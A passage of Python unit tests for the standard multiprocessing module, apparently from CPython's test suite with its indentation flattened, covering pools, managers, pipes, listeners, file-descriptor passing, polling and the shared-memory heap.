for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
        # __exit__() called pool.terminate(), so the pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
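# Helpers for _TestPoolWorkerErrors: raising() fails inside the worker, and
# unpickleable_result() returns a lambda, which cannot be pickled when the
# worker tries to send the result back to the parent.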
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
        # test cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
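# Note on the registrations above: 'Foo' is registered without an 'exposed'
# list, so its proxy exposes the public methods f() and g() but not _h();
# 'Bar' explicitly exposes only ('f', '_h'); 'baz' uses IteratorProxy so the
# returned proxy can be iterated.  _TestMyManager.common() checks exactly this.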
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
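# The client side mirrors _TestRemoteManager._putter() below: a second manager
# with the same address, authkey and serializer connects to the running server
# and obtains a proxy for the shared queue, e.g. (illustrative only):
#
#     mgr = QueueManager2(address=addr, authkey=key, serializer=SERIALIZER)
#     mgr.connect()
#     queue = mgr.get_queue()
#     queue.put('hello')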
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
        # Because we are using xmlrpclib for serialization instead of
        # pickle, this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
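# Empty byte string used as a sentinel to tell the echo child in the
# connection tests to exit.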
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
        # We test that a pipe connection can be closed by the parent
        # process immediately after the child is spawned.  On Windows
        # this sometimes failed on old versions because child_conn
        # would be closed before the child got a chance to duplicate
        # it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
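# Tests for connection.Listener objects (binding, context management,
# abstract sockets).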
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle.  This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA.  See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
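# Tests for Connection.poll() and for message boundaries being preserved.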
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
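# Tests for the private multiprocessing.heap block allocator.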
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
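# ctypes Structure used by the sharedctypes tests below.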
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
